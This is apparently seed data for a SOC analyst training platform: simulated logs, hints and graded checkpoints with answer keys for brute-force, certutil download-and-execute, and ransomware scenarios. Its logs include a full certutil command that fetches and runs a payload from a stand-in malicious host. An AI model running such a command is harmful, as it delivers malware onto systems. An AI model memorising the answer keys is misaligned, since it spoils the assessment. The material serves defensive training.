import { Difficulty, LogType, UnlockCondition, CheckpointType } from '@prisma/client';

export const scenario2 = {
  id: 'scenario-brute-force',
  name: 'Brute Force to Successful Login',
  description: 'Investigate a series of failed login attempts followed by a successful authentication and subsequent suspicious post-access activities.',
  difficulty: Difficulty.INTERMEDIATE,
  category: 'Credential Attacks',
  mitreAttackIds: ['T1110.001', 'T1078', 'T1021.002'],
  briefing: `## Scenario Briefing\n\nYou are a Tier 2 SOC Analyst at GlobalTech Inc. The SIEM has correlated multiple failed login events against a VPN endpoint over a short period, followed by a successful login.\n\nYour objectives:\n1. Analyze authentication logs to identify the attack pattern\n2. Determine if the successful login is legitimate or a result of the brute force\n3. Investigate post-login activities for lateral movement\n4. Recommend appropriate response actions\n\n**Alert**: The successful login occurred from a known-bad IP geolocation (Eastern Europe) while the user is based in New York.`,
  estimatedMinutes: 50,
  stages: [
    {
      stageNumber: 1,
      title: 'Failed Login Analysis',
      description: 'Examine authentication logs to identify the brute force attack pattern.',
      unlockCondition: UnlockCondition.AFTER_PREVIOUS,
      logs: [
        { logType: LogType.AUTH_LOG, summary: 'Failed login attempt for user m.davis from 91.215.44.12 - invalid password', severity: 'MEDIUM', hostname: 'VPN-GW01', username: 'm.davis', eventId: '4625', sourceIp: '91.215.44.12', timestamp: '2024-02-10T03:00:01Z', isEvidence: true, evidenceTag: 'brute-force-1', rawLog: { eventId: 4625, logonType: 3, targetUserName: 'm.davis', sourceIp: '91.215.44.12', failureReason: 'Bad password', attemptNumber: 1 }, sortOrder: 1 },
        { logType: LogType.AUTH_LOG, summary: 'Failed login attempt for user m.davis from 91.215.44.12 - invalid password (attempt 15)', severity: 'HIGH', hostname: 'VPN-GW01', username: 'm.davis', eventId: '4625', sourceIp: '91.215.44.12', timestamp: '2024-02-10T03:01:30Z', isEvidence: true, evidenceTag: 'brute-force-15', rawLog: { eventId: 4625, logonType: 3, targetUserName: 'm.davis', sourceIp: '91.215.44.12', failureReason: 'Bad password', attemptNumber: 15 }, sortOrder: 2 },
        { logType: LogType.AUTH_LOG, summary: 'Failed login for m.davis from 91.215.44.12 - attempt 47 of rapid sequence', severity: 'CRITICAL', hostname: 'VPN-GW01', username: 'm.davis', eventId: '4625', sourceIp: '91.215.44.12', timestamp: '2024-02-10T03:04:30Z', isEvidence: true, evidenceTag: 'brute-force-47', rawLog: { eventId: 4625, logonType: 3, targetUserName: 'm.davis', sourceIp: '91.215.44.12', failureReason: 'Bad password', attemptNumber: 47 }, sortOrder: 3 },
        { logType: LogType.SIEM_ALERT, summary: 'SIEM Alert: Brute force detected - 50+ failed logins for m.davis in 5 minutes', severity: 'CRITICAL', hostname: 'SIEM-01', username: 'm.davis', sourceIp: '91.215.44.12', timestamp: '2024-02-10T03:05:00Z', isEvidence: true, evidenceTag: 'siem-brute-force', rawLog: { alertId: 'SIEM-2024-7722', ruleName: 'Brute Force Detection', failedCount: 52, timeWindow: '5 minutes', targetAccount: 'm.davis', sourceIp: '91.215.44.12' }, sortOrder: 4 },
        { logType: LogType.AUTH_LOG, summary: 'Successful login for m.davis from 91.215.44.12 - after 52 failed attempts', severity: 'CRITICAL', hostname: 'VPN-GW01', username: 'm.davis', eventId: '4624', sourceIp: '91.215.44.12', timestamp: '2024-02-10T03:05:15Z', isEvidence: true, evidenceTag: 'successful-login', rawLog: { eventId: 4624, logonType: 3, targetUserName: 'm.davis', sourceIp: '91.215.44.12', authPackage: 'NTLM' }, sortOrder: 5 },
        { logType: LogType.AUTH_LOG, summary: 'Normal login for j.wilson from office IP', severity: 'INFO', hostname: 'VPN-GW01', username: 'j.wilson', eventId: '4624', sourceIp: '10.0.0.50', timestamp: '2024-02-10T03:02:00Z', isEvidence: false, rawLog: { eventId: 4624, logonType: 3, targetUserName: 'j.wilson', sourceIp: '10.0.0.50' }, sortOrder: 6 },
        { logType: LogType.FIREWALL, summary: 'Allowed VPN connection from 91.215.44.12', severity: 'HIGH', hostname: 'FW-01', sourceIp: '91.215.44.12', timestamp: '2024-02-10T03:00:00Z', isEvidence: true, evidenceTag: 'fw-vpn-allow', rawLog: { action: 'ALLOW', sourceIp: '91.215.44.12', destPort: 443, protocol: 'TCP', service: 'VPN' }, sortOrder: 7 },
        { logType: LogType.DNS, summary: 'Normal DNS query for vpn.globaltech.com', severity: 'INFO', hostname: 'DNS-01', timestamp: '2024-02-10T02:59:00Z', isEvidence: false, rawLog: { queryType: 'A', domain: 'vpn.globaltech.com', response: '203.0.113.10' }, sortOrder: 8 },
      ],
      hints: [
        { content: 'Count the failed logins vs successful - the ratio and speed indicate automated tooling.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'Check the geolocation of 91.215.44.12 - does it match where m.davis normally works?', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
    {
      stageNumber: 2,
      title: 'Successful Authentication Analysis',
      description: 'Examine the successful login and determine if it represents a compromised credential.',
      unlockCondition: UnlockCondition.AFTER_CHECKPOINT,
      logs: [
        { logType: LogType.AUTH_LOG, summary: 'VPN session established for m.davis - assigned IP 10.10.1.100', severity: 'HIGH', hostname: 'VPN-GW01', username: 'm.davis', sourceIp: '91.215.44.12', timestamp: '2024-02-10T03:05:20Z', isEvidence: true, evidenceTag: 'vpn-session', rawLog: { eventType: 'VPN_SESSION_START', user: 'm.davis', assignedIp: '10.10.1.100', sourceIp: '91.215.44.12', duration: 'active' }, sortOrder: 1 },
        { logType: LogType.SIEM_ALERT, summary: 'SIEM: Impossible travel - m.davis logged in from New York (yesterday) and Eastern Europe (now)', severity: 'CRITICAL', hostname: 'SIEM-01', username: 'm.davis', timestamp: '2024-02-10T03:06:00Z', isEvidence: true, evidenceTag: 'impossible-travel', rawLog: { alertId: 'SIEM-2024-7723', ruleName: 'Impossible Travel Detection', lastLocation: 'New York, USA', currentLocation: 'Kyiv, Ukraine', timeDifference: '8 hours', physicallyPossible: false }, sortOrder: 2 },
        { logType: LogType.AUTH_LOG, summary: 'Password change for m.davis from VPN session', severity: 'CRITICAL', hostname: 'DC-01', username: 'm.davis', eventId: '4723', sourceIp: '10.10.1.100', timestamp: '2024-02-10T03:08:00Z', isEvidence: true, evidenceTag: 'password-change', rawLog: { eventId: 4723, targetUserName: 'm.davis', sourceIp: '10.10.1.100', action: 'Password changed by user' }, sortOrder: 3 },
        { logType: LogType.AUTH_LOG, summary: 'Normal password change for s.lee - quarterly rotation', severity: 'INFO', hostname: 'DC-01', username: 's.lee', eventId: '4723', timestamp: '2024-02-10T09:00:00Z', isEvidence: false, rawLog: { eventId: 4723, targetUserName: 's.lee', reason: 'Quarterly rotation' }, sortOrder: 4 },
      ],
      hints: [
        { content: 'The impossible travel alert is key - check if the time gap could allow for legitimate travel.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'A password change immediately after brute force success is a classic persistence technique.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
    {
      stageNumber: 3,
      title: 'Post-Access Activity',
      description: 'Investigate post-authentication activities for signs of lateral movement or data access.',
      unlockCondition: UnlockCondition.AFTER_CHECKPOINT,
      logs: [
        { logType: LogType.NETWORK_FLOW, summary: 'SMB connection from 10.10.1.100 (m.davis VPN) to FILE-SRV01 - accessing finance share', severity: 'HIGH', hostname: 'FILE-SRV01', sourceIp: '10.10.1.100', destIp: '10.0.2.50', username: 'm.davis', timestamp: '2024-02-10T03:10:00Z', isEvidence: true, evidenceTag: 'smb-access', rawLog: { protocol: 'SMB', sourceIp: '10.10.1.100', destIp: '10.0.2.50', share: '\\\\FILE-SRV01\\Finance', filesAccessed: 15, bytesTransferred: 52428800 }, sortOrder: 1 },
        { logType: LogType.SIEM_ALERT, summary: 'SIEM: Unusual data access - m.davis accessing Finance share (not in normal access pattern)', severity: 'HIGH', hostname: 'SIEM-01', username: 'm.davis', timestamp: '2024-02-10T03:12:00Z', isEvidence: true, evidenceTag: 'unusual-access', rawLog: { alertId: 'SIEM-2024-7725', ruleName: 'Anomalous File Access', user: 'm.davis', normalDepartment: 'Engineering', accessedDepartment: 'Finance' }, sortOrder: 2 },
        { logType: LogType.AUTH_LOG, summary: 'RDP login attempt from 10.10.1.100 to DC-01 using m.davis credentials', severity: 'CRITICAL', hostname: 'DC-01', username: 'm.davis', eventId: '4624', sourceIp: '10.10.1.100', timestamp: '2024-02-10T03:15:00Z', isEvidence: true, evidenceTag: 'rdp-dc', rawLog: { eventId: 4624, logonType: 10, targetUserName: 'm.davis', sourceIp: '10.10.1.100', description: 'RDP logon to Domain Controller' }, sortOrder: 3 },
        { logType: LogType.NETWORK_FLOW, summary: 'Normal HTTP traffic from 10.0.1.25 to internet', severity: 'INFO', hostname: 'WS-PC025', sourceIp: '10.0.1.25', destIp: '142.250.80.46', timestamp: '2024-02-10T03:11:00Z', isEvidence: false, rawLog: { protocol: 'HTTPS', destPort: 443, application: 'Google', bytesOut: 1024 }, sortOrder: 4 },
        { logType: LogType.FIREWALL, summary: 'Blocked RDP from external - normal perimeter defense', severity: 'LOW', hostname: 'FW-01', sourceIp: '185.100.50.22', timestamp: '2024-02-10T03:14:00Z', isEvidence: false, rawLog: { action: 'BLOCK', sourceIp: '185.100.50.22', destPort: 3389, protocol: 'TCP' }, sortOrder: 5 },
      ],
      hints: [
        { content: 'An engineering user accessing finance shares is anomalous behavior - check the SIEM alert.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'RDP to a Domain Controller after VPN compromise suggests the attacker is attempting privilege escalation.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
  ],
  checkpoints: [
    { stageNumber: 1, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'How many failed login attempts preceded the successful login?', correctAnswer: '52', points: 10, category: 'accuracy', options: ['10', '25', '52', '100'], sortOrder: 1, explanation: 'The SIEM alert indicates 52 failed attempts in 5 minutes.' },
    { stageNumber: 1, checkpointType: CheckpointType.TRUE_FALSE, question: 'The brute force attack used NTLM authentication.', correctAnswer: true, points: 10, category: 'accuracy', options: ['True', 'False'], sortOrder: 2, explanation: 'The successful login event shows authPackage: NTLM.' },
    { stageNumber: 1, checkpointType: CheckpointType.SEVERITY_CLASSIFICATION, question: 'Classify the severity of the brute force attack.', correctAnswer: 'CRITICAL', points: 10, category: 'accuracy', options: ['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'], sortOrder: 3 },
    { stageNumber: 2, checkpointType: CheckpointType.TRUE_FALSE, question: 'The impossible travel alert confirms the login is from a different geographic location than normal.', correctAnswer: true, points: 10, category: 'accuracy', options: ['True', 'False'], sortOrder: 1 },
    { stageNumber: 2, checkpointType: CheckpointType.RECOMMENDED_ACTION, question: 'What is the first action you should take for the compromised account?', correctAnswer: 'Isolate the host', points: 15, category: 'response', options: ['Isolate the host', 'Reset the password', 'Monitor for 24 hours', 'Send an email to the user', 'Block at firewall'], sortOrder: 2 },
    { stageNumber: 3, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'What type of lateral movement was attempted?', correctAnswer: 'RDP to Domain Controller', points: 10, category: 'accuracy', options: ['SSH tunneling', 'RDP to Domain Controller', 'PsExec to workstations', 'WMI remote execution'], sortOrder: 1 },
    { stageNumber: 3, checkpointType: CheckpointType.EVIDENCE_SELECTION, question: 'Select all IOCs from this investigation.', correctAnswer: ['91.215.44.12', 'm.davis credential compromise', 'Finance share unauthorized access'], points: 15, category: 'evidence', options: ['91.215.44.12', 'm.davis credential compromise', 'Finance share unauthorized access', '10.0.0.50', 'Google HTTPS traffic', 'vpn.globaltech.com'], sortOrder: 2 },
    { stageNumber: 3, checkpointType: CheckpointType.INCIDENT_REPORT, question: 'Write an incident summary with at least 3 response recommendations.', correctAnswer: { keywords: ['brute force', 'credential', 'lateral movement', 'vpn', 'compromise'], minRecommendations: 3 }, points: 10, category: 'report', sortOrder: 3 },
  ],
};

export const scenario3 = {
  id: 'scenario-process-chain',
  name: 'Suspicious Process Chain',
  description: 'Investigate an EDR alert for a suspicious process execution chain involving cmd.exe downloading and executing an unknown binary.',
  difficulty: Difficulty.INTERMEDIATE,
  category: 'Endpoint Threats',
  mitreAttackIds: ['T1059.003', 'T1105', 'T1036'],
  briefing: `## Scenario Briefing\n\nYou are on the SOC team at MedCorp. An EDR alert flagged a suspicious process chain on a developer workstation DEV-WS10.\n\nThe alert shows cmd.exe spawning certutil.exe to download a file, which is then renamed and executed.\n\n**Investigate the full chain and determine the severity.**`,
  estimatedMinutes: 40,
  stages: [
    {
      stageNumber: 1,
      title: 'EDR Alert Triage',
      description: 'Review the initial EDR alert and understand the process chain.',
      unlockCondition: UnlockCondition.AFTER_PREVIOUS,
      logs: [
        { logType: LogType.EDR_ALERT, summary: 'EDR: Suspicious process chain - cmd.exe > certutil.exe > renamed binary execution', severity: 'CRITICAL', hostname: 'DEV-WS10', username: 'k.patel', processName: 'cmd.exe', timestamp: '2024-03-05T14:22:00Z', isEvidence: true, evidenceTag: 'edr-chain-alert', rawLog: { alertId: 'EDR-2024-3301', alertName: 'Living off the Land - Certutil Abuse', severity: 'Critical', processChain: ['explorer.exe', 'cmd.exe', 'certutil.exe'], mitreTechnique: 'T1105' }, sortOrder: 1 },
        { logType: LogType.SYSMON, summary: 'Process Create: cmd.exe spawned from explorer.exe by k.patel', severity: 'INFO', hostname: 'DEV-WS10', username: 'k.patel', processName: 'cmd.exe', eventId: '1', timestamp: '2024-03-05T14:22:00Z', isEvidence: true, evidenceTag: 'cmd-spawn', rawLog: { eventId: 1, processId: 7001, parentProcessId: 1200, image: 'C:\\Windows\\System32\\cmd.exe', parentImage: 'C:\\Windows\\explorer.exe', commandLine: 'cmd.exe /c certutil -urlcache -split -f http://dl.malware-host.xyz/update.bin C:\\Users\\k.patel\\AppData\\Local\\Temp\\sysupdate.exe', user: 'MEDCORP\\k.patel' }, sortOrder: 2 },
        { logType: LogType.SYSMON, summary: 'Process Create: certutil.exe downloading file from malware-host.xyz', severity: 'CRITICAL', hostname: 'DEV-WS10', username: 'k.patel', processName: 'certutil.exe', eventId: '1', timestamp: '2024-03-05T14:22:02Z', isEvidence: true, evidenceTag: 'certutil-download', rawLog: { eventId: 1, processId: 7002, parentProcessId: 7001, image: 'C:\\Windows\\System32\\certutil.exe', commandLine: 'certutil -urlcache -split -f http://dl.malware-host.xyz/update.bin C:\\Users\\k.patel\\AppData\\Local\\Temp\\sysupdate.exe', parentImage: 'cmd.exe' }, sortOrder: 3 },
        { logType: LogType.SYSMON, summary: 'File Create: sysupdate.exe written to Temp folder', severity: 'HIGH', hostname: 'DEV-WS10', processName: 'certutil.exe', eventId: '11', timestamp: '2024-03-05T14:22:05Z', isEvidence: true, evidenceTag: 'file-drop', rawLog: { eventId: 11, targetFilename: 'C:\\Users\\k.patel\\AppData\\Local\\Temp\\sysupdate.exe', hash: 'SHA256=abc123def456' }, sortOrder: 4 },
        { logType: LogType.SYSMON, summary: 'Normal: Visual Studio Code started by k.patel', severity: 'INFO', hostname: 'DEV-WS10', username: 'k.patel', processName: 'code.exe', eventId: '1', timestamp: '2024-03-05T14:00:00Z', isEvidence: false, rawLog: { eventId: 1, image: 'C:\\Program Files\\VSCode\\code.exe', parentImage: 'explorer.exe' }, sortOrder: 5 },
        { logType: LogType.SYSMON, summary: 'Normal: git.exe fetch operation by k.patel', severity: 'INFO', hostname: 'DEV-WS10', processName: 'git.exe', eventId: '1', timestamp: '2024-03-05T14:10:00Z', isEvidence: false, rawLog: { eventId: 1, image: 'C:\\Program Files\\Git\\bin\\git.exe', commandLine: 'git fetch origin' }, sortOrder: 6 },
      ],
      hints: [
        { content: 'certutil.exe is a legitimate Windows tool often abused for downloading files (LOLBin).', pointsPenalty: 3, sortOrder: 1 },
        { content: 'Look at the full command line - the URL and destination path are the key evidence.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
    {
      stageNumber: 2,
      title: 'Process Investigation',
      description: 'Trace the full execution chain and identify the payload behavior.',
      unlockCondition: UnlockCondition.AFTER_CHECKPOINT,
      logs: [
        { logType: LogType.SYSMON, summary: 'Process Create: sysupdate.exe executed from Temp directory', severity: 'CRITICAL', hostname: 'DEV-WS10', username: 'k.patel', processName: 'sysupdate.exe', eventId: '1', timestamp: '2024-03-05T14:22:10Z', isEvidence: true, evidenceTag: 'payload-exec', rawLog: { eventId: 1, processId: 7003, parentProcessId: 7001, image: 'C:\\Users\\k.patel\\AppData\\Local\\Temp\\sysupdate.exe', parentImage: 'cmd.exe', hash: 'SHA256=abc123def456' }, sortOrder: 1 },
        { logType: LogType.SYSMON, summary: 'Registry modification: sysupdate.exe adding Run key for persistence', severity: 'CRITICAL', hostname: 'DEV-WS10', processName: 'sysupdate.exe', eventId: '13', timestamp: '2024-03-05T14:22:15Z', isEvidence: true, evidenceTag: 'persistence-reg', rawLog: { eventId: 13, eventType: 'SetValue', processId: 7003, targetObject: 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemUpdate', details: 'C:\\Users\\k.patel\\AppData\\Local\\Temp\\sysupdate.exe' }, sortOrder: 2 },
        { logType: LogType.SYSMON, summary: 'Network Connection: sysupdate.exe connecting to 94.131.22.8:8443', severity: 'HIGH', hostname: 'DEV-WS10', processName: 'sysupdate.exe', eventId: '3', sourceIp: '10.0.3.10', destIp: '94.131.22.8', timestamp: '2024-03-05T14:22:20Z', isEvidence: true, evidenceTag: 'c2-connection', rawLog: { eventId: 3, processId: 7003, sourceIp: '10.0.3.10', sourcePort: 50100, destIp: '94.131.22.8', destPort: 8443 }, sortOrder: 3 },
        { logType: LogType.EDR_ALERT, summary: 'EDR: Persistence mechanism detected - Run key modification by unsigned binary', severity: 'CRITICAL', hostname: 'DEV-WS10', timestamp: '2024-03-05T14:22:16Z', isEvidence: true, evidenceTag: 'edr-persistence', rawLog: { alertId: 'EDR-2024-3302', alertName: 'Registry Persistence via Run Key', technique: 'T1547.001' }, sortOrder: 4 },
        { logType: LogType.WINDOWS_EVENT, summary: 'Normal: Scheduled task for Windows Defender scan', severity: 'INFO', hostname: 'DEV-WS10', eventId: '106', timestamp: '2024-03-05T12:00:00Z', isEvidence: false, rawLog: { eventId: 106, taskName: 'Windows Defender Scheduled Scan' }, sortOrder: 5 },
      ],
      hints: [
        { content: 'Registry Run keys are a common persistence technique - check Sysmon Event ID 13.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'The outbound connection to port 8443 from an unsigned binary is likely C2 communication.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
    {
      stageNumber: 3,
      title: 'Payload Analysis',
      description: 'Analyze the network communication and determine the full scope of compromise.',
      unlockCondition: UnlockCondition.AFTER_CHECKPOINT,
      logs: [
        { logType: LogType.NETWORK_FLOW, summary: 'Repeated HTTPS connections from DEV-WS10 to 94.131.22.8:8443 - beacon pattern', severity: 'CRITICAL', hostname: 'DEV-WS10', sourceIp: '10.0.3.10', destIp: '94.131.22.8', timestamp: '2024-03-05T14:25:00Z', isEvidence: true, evidenceTag: 'beacon', rawLog: { flowId: 'F-2024-9001', sourceIp: '10.0.3.10', destIp: '94.131.22.8', destPort: 8443, beaconInterval: 30, sessionsObserved: 20 }, sortOrder: 1 },
        { logType: LogType.PROXY, summary: 'Proxy: Connection to 94.131.22.8 uses JA3 hash matching known Cobalt Strike', severity: 'CRITICAL', hostname: 'PROXY-01', sourceIp: '10.0.3.10', destIp: '94.131.22.8', timestamp: '2024-03-05T14:25:05Z', isEvidence: true, evidenceTag: 'cobalt-strike', rawLog: { ja3Hash: '72a589da586844d7f0818ce684948eea', ja3Match: 'Cobalt Strike Beacon', confidence: 0.95 }, sortOrder: 2 },
        { logType: LogType.DNS, summary: 'DNS query for dl.malware-host.xyz resolved to 94.131.22.8', severity: 'HIGH', hostname: 'DNS-01', sourceIp: '10.0.3.10', destIp: '94.131.22.8', timestamp: '2024-03-05T14:21:58Z', isEvidence: true, evidenceTag: 'malicious-dns', rawLog: { queryType: 'A', domain: 'dl.malware-host.xyz', response: '94.131.22.8', registeredDate: '2024-03-01' }, sortOrder: 3 },
        { logType: LogType.FIREWALL, summary: 'Normal HTTPS outbound from DEV-WS10 to GitHub', severity: 'INFO', hostname: 'FW-01', sourceIp: '10.0.3.10', destIp: '140.82.121.4', timestamp: '2024-03-05T14:15:00Z', isEvidence: false, rawLog: { action: 'ALLOW', destPort: 443, application: 'GitHub' }, sortOrder: 4 },
      ],
      hints: [
        { content: 'JA3 fingerprinting can identify specific C2 frameworks. Check the proxy logs.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'The domain dl.malware-host.xyz was registered only 4 days ago - a red flag for new infrastructure.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
  ],
  checkpoints: [
    { stageNumber: 1, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'Which LOLBin was used to download the payload?', correctAnswer: 'certutil.exe', points: 10, category: 'accuracy', options: ['bitsadmin.exe', 'certutil.exe', 'powershell.exe', 'mshta.exe'], sortOrder: 1 },
    { stageNumber: 1, checkpointType: CheckpointType.TRUE_FALSE, question: 'The download URL uses HTTPS encryption.', correctAnswer: false, points: 10, category: 'accuracy', options: ['True', 'False'], sortOrder: 2, explanation: 'The URL uses plain HTTP, not HTTPS.' },
    { stageNumber: 2, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'What persistence mechanism was used?', correctAnswer: 'Registry Run key', points: 10, category: 'accuracy', options: ['Scheduled task', 'Registry Run key', 'Service installation', 'WMI subscription'], sortOrder: 1 },
    { stageNumber: 2, checkpointType: CheckpointType.RECOMMENDED_ACTION, question: 'What immediate action should be taken?', correctAnswer: 'Isolate the host', points: 15, category: 'response', options: ['Isolate the host', 'Delete the registry key', 'Reboot the system', 'Monitor for 24 hours'], sortOrder: 2 },
    { stageNumber: 3, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'What C2 framework was identified?', correctAnswer: 'Cobalt Strike', points: 10, category: 'accuracy', options: ['Metasploit', 'Cobalt Strike', 'Empire', 'Sliver'], sortOrder: 1 },
    { stageNumber: 3, checkpointType: CheckpointType.EVIDENCE_SELECTION, question: 'Select all IOCs.', correctAnswer: ['94.131.22.8', 'dl.malware-host.xyz', 'sysupdate.exe', 'abc123def456'], points: 15, category: 'evidence', options: ['94.131.22.8', 'dl.malware-host.xyz', 'sysupdate.exe', 'abc123def456', '10.0.3.10', 'code.exe', 'GitHub'], sortOrder: 2 },
    { stageNumber: 3, checkpointType: CheckpointType.SEVERITY_CLASSIFICATION, question: 'Overall incident severity?', correctAnswer: 'CRITICAL', points: 10, category: 'accuracy', options: ['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'], sortOrder: 3 },
    { stageNumber: 3, checkpointType: CheckpointType.INCIDENT_REPORT, question: 'Write incident summary with 3+ recommendations.', correctAnswer: { keywords: ['certutil', 'cobalt strike', 'persistence', 'c2', 'lolbin'], minRecommendations: 3 }, points: 10, category: 'report', sortOrder: 4 },
  ],
};

export const scenario4 = {
  id: 'scenario-malware-folder',
  name: 'Malware in Public Folder',
  description: 'A user reports slow performance. Investigation reveals malware spread through a public network share with ransomware-like behavior.',
  difficulty: Difficulty.ADVANCED,
  category: 'Malware Analysis',
  mitreAttackIds: ['T1204.002', 'T1569.002', 'T1486'],
  briefing: `## Scenario Briefing\n\nThe helpdesk received a ticket from user a.martinez about unusual file encryption on their workstation WS-HR05. Several .docx and .xlsx files appear to have been renamed with a .locked extension.\n\nInitial triage suggests the malware entered through a shared public folder.\n\n**Priority: HIGH - Potential ransomware. Contain before lateral spread.**`,
  estimatedMinutes: 40,
  stages: [
    {
      stageNumber: 1,
      title: 'File System Alert',
      description: 'Analyze the initial file system and EDR alerts to understand the malware entry point.',
      unlockCondition: UnlockCondition.AFTER_PREVIOUS,
      logs: [
        { logType: LogType.EDR_ALERT, summary: 'EDR: Rapid file modification detected - 50+ files renamed to .locked in 30 seconds', severity: 'CRITICAL', hostname: 'WS-HR05', username: 'a.martinez', timestamp: '2024-03-20T11:30:00Z', isEvidence: true, evidenceTag: 'ransomware-alert', rawLog: { alertId: 'EDR-2024-5501', alertName: 'Ransomware-like File Modification', filesAffected: 53, extension: '.locked', timeWindow: '30 seconds' }, sortOrder: 1 },
        { logType: LogType.SYSMON, summary: 'File Create: HRToolkit_v2.exe copied from \\\\SHARE-01\\Public to local Downloads', severity: 'HIGH', hostname: 'WS-HR05', username: 'a.martinez', processName: 'explorer.exe', eventId: '11', timestamp: '2024-03-20T11:25:00Z', isEvidence: true, evidenceTag: 'malware-copy', rawLog: { eventId: 11, sourceFile: '\\\\SHARE-01\\Public\\HRToolkit_v2.exe', targetFilename: 'C:\\Users\\a.martinez\\Downloads\\HRToolkit_v2.exe', hash: 'SHA256=ransomware_hash_001' }, sortOrder: 2 },
        { logType: LogType.SYSMON, summary: 'Process Create: HRToolkit_v2.exe executed by a.martinez', severity: 'CRITICAL', hostname: 'WS-HR05', username: 'a.martinez', processName: 'HRToolkit_v2.exe', eventId: '1', timestamp: '2024-03-20T11:29:55Z', isEvidence: true, evidenceTag: 'malware-exec', rawLog: { eventId: 1, processId: 8001, image: 'C:\\Users\\a.martinez\\Downloads\\HRToolkit_v2.exe', parentImage: 'explorer.exe', hash: 'SHA256=ransomware_hash_001', signed: false }, sortOrder: 3 },
        { logType: LogType.SYSMON, summary: 'File modification: Budget_2024.xlsx renamed to Budget_2024.xlsx.locked', severity: 'CRITICAL', hostname: 'WS-HR05', processName: 'HRToolkit_v2.exe', eventId: '11', timestamp: '2024-03-20T11:30:02Z', isEvidence: true, evidenceTag: 'file-encryption', rawLog: { eventId: 11, processId: 8001, sourceFile: 'C:\\Users\\a.martinez\\Documents\\Budget_2024.xlsx', targetFilename: 'C:\\Users\\a.martinez\\Documents\\Budget_2024.xlsx.locked' }, sortOrder: 4 },
        { logType: LogType.SYSMON, summary: 'Normal: Chrome browser started by a.martinez', severity: 'INFO', hostname: 'WS-HR05', processName: 'chrome.exe', eventId: '1', timestamp: '2024-03-20T11:00:00Z', isEvidence: false, rawLog: { eventId: 1, image: 'chrome.exe', parentImage: 'explorer.exe' }, sortOrder: 5 },
        { logType: LogType.EDR_ALERT, summary: 'EDR Info: USB storage device connected to WS-HR05 (routine)', severity: 'INFO', hostname: 'WS-HR05', timestamp: '2024-03-20T10:00:00Z', isEvidence: false, rawLog: { alertId: 'EDR-INFO-8001', alertName: 'USB Device Connected', device: 'Kingston DataTraveler' }, sortOrder: 6 },
      ],
      hints: [
        { content: 'The file was copied from a public network share - check the source path.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'The .locked extension and rapid file renaming are classic ransomware indicators.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
    {
      stageNumber: 2,
      title: 'Execution & Spread',
      description: 'Trace the malware execution, determine if it spread to other systems via the share.',
      unlockCondition: UnlockCondition.AFTER_CHECKPOINT,
      logs: [
        { logType: LogType.SYSMON, summary: 'HRToolkit_v2.exe created ransom note README_LOCKED.txt on Desktop', severity: 'CRITICAL', hostname: 'WS-HR05', processName: 'HRToolkit_v2.exe', eventId: '11', timestamp: '2024-03-20T11:31:00Z', isEvidence: true, evidenceTag: 'ransom-note', rawLog: { eventId: 11, processId: 8001, targetFilename: 'C:\\Users\\a.martinez\\Desktop\\README_LOCKED.txt', content: 'Your files have been encrypted. Send 0.5 BTC to...' }, sortOrder: 1 },
        { logType: LogType.NETWORK_FLOW, summary: 'SMB connections from WS-HR05 scanning internal network for shared folders', severity: 'CRITICAL', hostname: 'WS-HR05', sourceIp: '10.0.5.15', timestamp: '2024-03-20T11:31:30Z', isEvidence: true, evidenceTag: 'lateral-scan', rawLog: { sourceIp: '10.0.5.15', protocol: 'SMB', destPorts: [445], targetsScanned: 25, connectionsEstablished: 8 }, sortOrder: 2 },
        { logType: LogType.EDR_ALERT, summary: 'EDR: HRToolkit_v2.exe detected on SHARE-01 Public folder - multiple users at risk', severity: 'CRITICAL', hostname: 'SHARE-01', timestamp: '2024-03-20T11:20:00Z', isEvidence: true, evidenceTag: 'share-malware', rawLog: { alertId: 'EDR-2024-5502', filePath: '\\\\SHARE-01\\Public\\HRToolkit_v2.exe', uploadedBy: 'unknown', firstSeen: '2024-03-20T10:00:00Z', downloadCount: 3 }, sortOrder: 3 },
        { logType: LogType.SIEM_ALERT, summary: 'SIEM: Ransomware containment recommendation - isolate WS-HR05 and quarantine SHARE-01', severity: 'CRITICAL', hostname: 'SIEM-01', timestamp: '2024-03-20T11:32:00Z', isEvidence: true, evidenceTag: 'siem-containment', rawLog: { alertId: 'SIEM-2024-9901', recommendation: 'Immediate network isolation', affectedSystems: ['WS-HR05', 'SHARE-01'] }, sortOrder: 4 },
        { logType: LogType.AUTH_LOG, summary: 'Normal login for b.garcia at WS-HR06', severity: 'INFO', hostname: 'WS-HR06', username: 'b.garcia', eventId: '4624', timestamp: '2024-03-20T11:25:00Z', isEvidence: false, rawLog: { eventId: 4624, logonType: 2 }, sortOrder: 5 },
      ],
      hints: [
        { content: 'The malware was on the public share since 10 AM - check how many users downloaded it.', pointsPenalty: 3, sortOrder: 1 },
        { content: 'SMB scanning after execution indicates the ransomware is attempting lateral movement.', pointsPenalty: 5, sortOrder: 2 },
      ],
    },
  ],
  checkpoints: [
    { stageNumber: 1, checkpointType: CheckpointType.MULTIPLE_CHOICE, question: 'How did the malware reach the workstation?', correctAnswer: 'Public network share', points: 10, category: 'accuracy', options: ['Email attachment', 'Public network share', 'USB drive', 'Web download'], sortOrder: 1 },
    { stageNumber: 1, checkpointType: CheckpointType.TRUE_FALSE, question: 'The malware executable was digitally signed.', correctAnswer: false, points: 10, category: 'accuracy', options: ['True', 'False'], sortOrder: 2 },
